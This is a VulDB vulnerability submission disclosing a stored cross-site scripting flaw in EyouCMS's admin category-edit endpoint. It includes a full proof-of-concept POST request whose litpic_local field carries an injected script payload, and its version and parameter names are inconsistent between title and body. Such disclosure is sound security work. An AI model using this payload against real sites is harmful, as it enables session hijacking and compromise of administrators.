| Titre | eyoucms up to 1.6.2 'litpic_loca' stored xss vulnerability POC: |
|---|
| Description | eyoucms v1.5.4 typename parameter has a stored XSS vulnerability, attacker can update a new picture to a xss payload, and trigger the vulnerability when edit or view it again.
The vulnerable method + URI is:
POST /eyou/login.php?m=admin&c=Arctype&a=edit&lang=cn
and vulnerable parameter is 'litpic_loca'
POC below:
POST /eyou/login.php?m=admin&c=Arctype&a=edit&lang=cn HTTP/1.1
***********************************
typename=%E6%96%B0%E9%97%BB%E5%8A%A8%E6%80%81&dirname=xinwendongtai¤t_channel=1&parent_id=0&channeltype=1&diy_dirpath=%2Fxinwendongtai&dirpath=&is_hidden=0&is_part=0&typelink=&englist_name=News+%26+Trends&litpic_local=%3Cimg+src%3D1+onerror%3Dalert%281%29%3E&litpic_remote=&old_arcrank=0&typearcrank=0&templist=lists_article.htm&tempview=view_article.htm&rulelist=%7B%E6%A0%8F%E7%9B%AE%E7%9B%AE%E5%BD%95%7D%2Flist_%7Btid%7D_%7Bpage%7D.html&ruleview=%7B%E6%A0%8F%E7%9B%AE%E7%9B%AE%E5%BD%95%7D%2F%7Baid%7D.html&seo_title=&seo_keywords=&seo_description=&tab=1&id=2&grade=0&oldgrade=0&old_current_channel=1
See details and poc at https://github.com/sleepyvv/vul_report/blob/main/EYOUCMS/XSS1.md |
|---|
| La source | ⚠️ https://www.eyoucms.com/ |
|---|
| Utilisateur | WWesleywww (UID 43117) |
|---|
| Soumission | 03/04/2023 14:38 (il y a 3 ans) |
|---|
| Modérer | 14/04/2023 10:34 (11 days later) |
|---|
| Statut | Accepté |
|---|
| Entrée VulDB | 225942 [EyouCms 1.5.4 New Picture login.php?m=admin&c=Arctype&a=edit litpic_loca cross site scripting] |
|---|
| Points | 17 |
|---|